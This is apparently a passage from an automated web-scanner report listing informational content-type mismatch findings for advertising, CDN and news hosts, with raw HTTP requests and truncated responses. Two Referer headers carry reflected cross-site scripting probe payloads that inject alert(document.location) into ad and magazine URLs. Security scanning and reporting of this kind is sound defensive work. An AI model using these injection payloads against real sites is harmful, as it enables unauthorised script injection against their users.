User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.local.com/mk/get/advertising-opportunities

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:57 GMT
Server: Apache
ETag: "21//trunk/jquery.html5form-min.js"
Accept-Ranges: bytes
Expires: Sat, 17 Sep 2011 16:37:59 GMT
Content-Length: 4704
Content-Type: text/plain
Age: 157
Cache-Control: public, max-age=180

(function($){$.fn.html5form=function(options){$(this).each(function(){var defaults={async:true,method:$(this).attr('method'),responseDiv:null,labels:'show',colorOn:'#000000',colorOff:'#a1a1a1',action:
...[SNIP]...
26.25. http://o.aolcdn.com/os_merge/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /os_merge/?file=/aol/jquery-1.4.2.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.openwindow.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare-1.2.min.js HTTP/1.1
Host: o.aolcdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 24 Aug 2011 15:36:26 GMT
Content-Type: text/plain
Cache-Control: public, max-age=2592000
Expires: Mon, 17 Oct 2011 17:35:32 GMT
Date: Sat, 17 Sep 2011 17:35:32 GMT
Content-Length: 84653
Connection: close
Vary: Accept-Encoding

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
26.26. http://ps2.newsinc.com/Playlist/show/90009/1709/507.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ps2.newsinc.com
Path:   /Playlist/show/90009/1709/507.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /Playlist/show/90009/1709/507.xml HTTP/1.1
Host: ps2.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 17 Sep 2011 16:23:18 GMT
Expires: -1
NDN-Server: PS01
NDN-SiteVer: 3.2.1
Pragma: no-cache
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 2.0
X-Powered-By: ASP.NET
Content-Length: 4080
Connection: keep-alive


<?xml version="1.0" encoding="UTF-8"?>
<ServiceResponse xmlns="http://permissiontv.com/v2.2/ptvml">
   <Status>200</Status>
   <Message>Success.</Message>
   
<Playlist>
<ID>507</ID>
<Nam
...[SNIP]...
26.27. http://ps2.newsinc.com/players/GetZoneID/90009.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ps2.newsinc.com
Path:   /players/GetZoneID/90009.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /players/GetZoneID/90009.xml?jsoncallback=jQuery1610804759040940553_1316294661395&_=1316294661643 HTTP/1.1
Host: ps2.newsinc.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json; charset=utf-8
Date: Sat, 17 Sep 2011 16:23:10 GMT
Expires: -1
NDN-Server: PS01
NDN-SiteVer: 3.2.1
Pragma: no-cache
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-AspNetMvc-Version: 2.0
X-Powered-By: ASP.NET
Content-Length: 46
Connection: keep-alive

jQuery1610804759040940553_1316294661395(50912)
26.28. http://r.skimresources.com/api/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://r.skimresources.com
Path:   /api/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /api/?callback=skimlinksApplyHandlers&data=%7B%22pubcode%22%3A%22905X224440%22%2C%22domains%22%3A%5B%22rachelroy.com%22%2C%22endless.com%22%2C%22temptalia.com%22%2C%22sephora.com%22%2C%22facebook.com%22%2C%22twitter.com%22%2C%22digg.com%22%2C%22myspace.com%22%2C%22new.facebook.com%22%2C%22sweepstakes.womansday.com%22%2C%22services.hearstmags.com%22%2C%22caranddriver.com%22%2C%22cycleworld.com%22%2C%22elledecor.com%22%2C%22roadandtrack.com%22%2C%22womansday.com%22%2C%22glo.msn.com%22%5D%7D HTTP/1.1
Host: r.skimresources.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Sep 2011 16:35:40 GMT
P3P: policyref="http://skimlinks.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Server: Apache
Set-Cookie: skimGUID=af7c6cccf2814117102a6929c45f1eb3; expires=Tue, 14-Sep-2021 16:35:40 GMT
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
X-SKIM-Hostname: api04.angel.skimlinks.com
Content-Length: 132
Connection: keep-alive

skimlinksApplyHandlers({"merchant_domains":["sephora.com","endless.com"],"guid":"af7c6cccf2814117102a6929c45f1eb3","country":"US"});
26.29. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=DLSRD1&AP=1390 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; TOptOut=1; MC1=V=3&GUID=5ac4e212f4dc41e28ae541c631a9a2ed; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=53847eaa577b4a27af787123681cd00c&bd=2011-09-15T16:18:14.634&v=2; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318873684837%26vn%3D1; MSNTVID=5ac4e212f4dc41e28ae541c631a9a2ed; VWCUKP300=L123100/Q80830_15132_2078_091711_1_093011_489193x482893x091711x1x1; s_nr=1316282718696; mbox=session#1316281807974-204714#1316285017|PC#1316281807974-204714.19#1317492757|check#true#1316283217; Sample=3; zip=c:us

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1992
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8588141-T8330982-C113000000000040404
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:27:56 GMT
Content-Length: 1992


//<![CDATA[
function getRADIds() { return{"adid":"113000000000040404","pid":"8588141","targetid":"8330982"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
26.30. http://seattlepi.ux.hearstdigitalnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://seattlepi.ux.hearstdigitalnews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: seattlepi.ux.hearstdigitalnews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:26:50 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 01:22:12 GMT
ETag: "10c8cb3-47e-dbc0b900"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................................'....................'..............................,{..j........................r.....................
...[SNIP]...
26.31. http://sensor2.suitesmart.com/sensor4.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /sensor4.js?GID=14531;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/UJ3/iview/295138956/direct/01/6447245?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B234716514%3B0-0%3B1%3B33263296%3B4252-336/280%3B40530567/40548354/1%3B%3B%7Eokv%3D%3Bsz%3D336x280%3Btile%3D2%3Bpos%3D4%3Bsite%3Dseventeen%3Bsect%3Dindex%3Bsub%3Dindex%3Bsubsub%3Dindex%3Bpage%3Dhomepage%3Bcat%3Dother%3Bsubcat%3D%3Btool%3Dros%3Bartid%3D%3Bkw%3D%3Ba%3D%3Bb%3D%3BmtfIFPath%3D/cm/shared/admeld/%3Bgame%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G14853=C1S98373-1-0-0-0-1315398787-0; G15493=C1S99917-4-0-0-0-1315313090-907727

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:52 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G14531=C1S102386-3-0-0-0-1316276740-852; path=/; domain=.suitesmart.com; expires=Thu, 15-Mar-2012 16:39:52 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Sat, 17 Sep 2011 16:39:52 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...
26.32. http://stamfordadvocate.ux.hearstdigitalnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://stamfordadvocate.ux.hearstdigitalnews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: stamfordadvocate.ux.hearstdigitalnews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:31 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 22:04:17 GMT
ETag: "1041166-47e-51f9ba40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ..............................................................................................................................................................f.7.f
...[SNIP]...
26.33. http://thumbnail.newsinc.com/23529630.sf.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://thumbnail.newsinc.com
Path:   /23529630.sf.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /23529630.sf.jpg HTTP/1.1
Host: thumbnail.newsinc.com
Proxy-Connection: keep-alive
Referer: http://assets.newsinc.com/flash/ndn_toppicks_widget.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503

Response

HTTP/1.1 200 OK
x-amz-id-2: Hq0LVLkHqPUsE0UQ1pl5p/vYPU+ItFV+kIDjeh/FxKw/mqw9KY9doEqcPkbZ9kO4
x-amz-request-id: 0C0F3DBB8A76FC9F
Date: Sat, 17 Sep 2011 16:24:13 GMT
Last-Modified: Sat, 17 Sep 2011 15:18:26 GMT
ETag: "08b438b1d63a8c27ec5e600a42948441"
Accept-Ranges: bytes
Content-Type: image/jpeg
Content-Length: 229403
Server: AmazonS3

.PNG
.
...IHDR.......>.....W.......gAMA....B.O.....bKGD.............    pHYs................    vpAg.......>...Tt....IDATx.l.i.m.u...9..{.sn...3..h..A. ....*.j.*...U..#,U....G8.........;.(K.U.-J..UAR,...
...[SNIP]...
26.34. http://tracker.u-link.me/ut_.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tracker.u-link.me
Path:   /ut_.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ut_.js HTTP/1.1
Host: tracker.u-link.me
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:20:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 547
Content-Type: text/html

if(window.uw_partner_id){
   try {
       var uw_script = "http://widget.uproxx.com/pageTracker_v2";
       var uw_host = window.location.hostname;
       var uw_hostpath = window.location;
       var uw_referrer = documen
...[SNIP]...
26.35. http://ua.uproxxcdn.com/CXBetoHkoRG7G0E.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ua.uproxxcdn.com
Path:   /CXBetoHkoRG7G0E.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /CXBetoHkoRG7G0E.png HTTP/1.1
Host: ua.uproxxcdn.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 16:25:44 GMT
Content-Type: image/png
Connection: keep-alive
Last-Modified: Thu, 18 Aug 2011 16:18:07 GMT
ETag: "5b40-4aac9f5460dc0"
Content-Length: 23360
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 16:25:44 GMT
X-Cache: HIT
Accept-Ranges: bytes

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...
26.36. http://ua.uproxxcdn.com/DZ2iEV7OFqoJUqT.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ua.uproxxcdn.com
Path:   /DZ2iEV7OFqoJUqT.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /DZ2iEV7OFqoJUqT.png HTTP/1.1
Host: ua.uproxxcdn.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 17:02:02 GMT
Content-Type: image/png
Connection: keep-alive
Last-Modified: Sat, 10 Sep 2011 02:25:37 GMT
ETag: "1aef-4ac8d025f2a40"
Content-Length: 6895
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 17:02:02 GMT
X-Cache: HIT
Accept-Ranges: bytes

......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................    .    ..
...


......    ...........C...............
...[SNIP]...
26.37. http://ua.uproxxcdn.com/FKOcJyHi3WPtNW3.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ua.uproxxcdn.com
Path:   /FKOcJyHi3WPtNW3.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /FKOcJyHi3WPtNW3.png HTTP/1.1
Host: ua.uproxxcdn.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 17:18:24 GMT
Content-Type: image/png
Connection: keep-alive
Last-Modified: Tue, 12 Jul 2011 22:00:19 GMT
ETag: "43e7-4a7e66cf2a2c0"
Content-Length: 17383
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 17:18:24 GMT
X-Cache: HIT
Accept-Ranges: bytes

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...
26.38. http://ua.uproxxcdn.com/RagyhhqntMN7eO5.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ua.uproxxcdn.com
Path:   /RagyhhqntMN7eO5.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /RagyhhqntMN7eO5.png HTTP/1.1
Host: ua.uproxxcdn.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 17:07:35 GMT
Content-Type: image/png
Connection: keep-alive
Last-Modified: Sat, 10 Sep 2011 02:27:59 GMT
ETag: "2bb1-4ac8d0ad5e9c0"
Content-Length: 11185
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 17:07:35 GMT
X-Cache: HIT
Accept-Ranges: bytes

......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................    .    ..
...


......    ...........C...............
...[SNIP]...
26.39. http://ua.uproxxcdn.com/WiYUAs3s08PJENf.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ua.uproxxcdn.com
Path:   /WiYUAs3s08PJENf.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /WiYUAs3s08PJENf.png HTTP/1.1
Host: ua.uproxxcdn.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 16:31:48 GMT
Content-Type: image/png
Connection: keep-alive
Last-Modified: Tue, 13 Sep 2011 17:45:11 GMT
ETag: "4314-4acd63485b7c0"
Content-Length: 17172
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 16:31:48 GMT
X-Cache: HIT
Accept-Ranges: bytes

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...
26.40. http://ua.uproxxcdn.com/r63wMetmtJgpwY8.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ua.uproxxcdn.com
Path:   /r63wMetmtJgpwY8.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /r63wMetmtJgpwY8.jpg HTTP/1.1
Host: ua.uproxxcdn.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sat, 17 Sep 2011 16:51:39 GMT
Content-Type: image/jpeg
Connection: keep-alive
Last-Modified: Fri, 02 Sep 2011 14:34:26 GMT
ETag: "8a16-4abf64217c080"
Content-Length: 35350
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 16:51:39 GMT
X-Cache: HIT
Accept-Ranges: bytes

.PNG
.
...IHDR.......n.....P..O....sRGB.........gAMA......a....    pHYs..........o.d....IDATx^...t............La....RJ!m.n........,.lI..l.8.....xR.uzz....]..........f.~.1....v+!uR.y......... .P..?E..P4
...[SNIP]...
26.41. http://video.od.visiblemeasures.com/log  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://video.od.visiblemeasures.com
Path:   /log

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /log?m=USM2WGACdkskUn8rRk1BZnFwHHR0EgoCXVdRNkpBFwt3UyxdEXRxXlA1MUkkR1VLMhFwBV9cRTErSQ0rV1NRJRAAdTRRRRRLU14nX1kPUw0FZ3B8cgcAC3MDencLDwRycwMBYEZEBXUGAwZ2AAEFDAoBcQASM0RVR38GewNxCQh2cnJzBH8BcXUIeAALAgEHAQtxdHt0BQp2dXdydgBzAwxxZF0kQ1EcdHI0JkAEBWZwdAtjAHIJdBNWUTBYEAd%2FRFknDQV1BgYHe3YOcA8BCXMSLSFYXFI3C1UEdwEGDnYMBgdyCQUECxcDAgESJUMNBHFzD3cOBA53BHJ1AR9aJjsMXCgXBXwxRhcFAg5WAVhWVHpWVnMEAwMnc199UgAJcQRycwIJFycjRVhjB3FIMUcPWDBNRRcKcxVxdhF0cUdCNWcLAFNVVShHKmYAfFIsLxQLABRTWTBUFwUCSVRBBHYAcXVwcAcGcwQAAQECcQxzAXFzdn1wBwQHfwcHAH5wAQEEBQkHBA4UViZRQDNFVQhzZwsABg%3D%3D&p=1 HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-msn.com/v/4508.01/fl/player/current/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:24:48 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Thu, 24 Feb 2011 08:33:55 GMT
X-Cnection: close
Accept-Ranges: bytes

objectid=1
26.42. http://vms.msn.com/vms.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vms.msn.com
Path:   /vms.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /vms.aspx?mediaid=11111111-1111-1111-1111-111111111111&publisher=MSN%20Video&player=sponsor&subplayer=MSVDIV HTTP/1.1
Host: vms.msn.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-msn.com/v/4508.01/fl/player/current/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; TOptOut=1; MC1=V=3&GUID=5ac4e212f4dc41e28ae541c631a9a2ed; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=53847eaa577b4a27af787123681cd00c&bd=2011-09-15T16:18:14.634&v=2; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; s_vnum=1318873684837%26vn%3D1; MSNTVID=5ac4e212f4dc41e28ae541c631a9a2ed; VWCUKP300=L123100/Q80830_15132_2078_091711_1_093011_489193x482893x091711x1x1; s_nr=1316282718696; mbox=session#1316281807974-204714#1316285017|PC#1316281807974-204714.19#1317492757|check#true#1316283217; Sample=3; zip=c:us

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 438
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:30:24 GMT
Content-Length: 438

<?xml version="1.0" encoding="utf-8"?><AdManifest><AdManifestVersion version="1.0" /><ClientPolicy><Attribute Name="clickToContinue" Value="false" /><Attribute Name="replayPolicy" Value="unlock" /><At
...[SNIP]...
26.43. http://www.delish.com/api_static/twitter.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.delish.com
Path:   /api_static/twitter.json

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /api_static/twitter.json HTTP/1.1
Host: www.delish.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
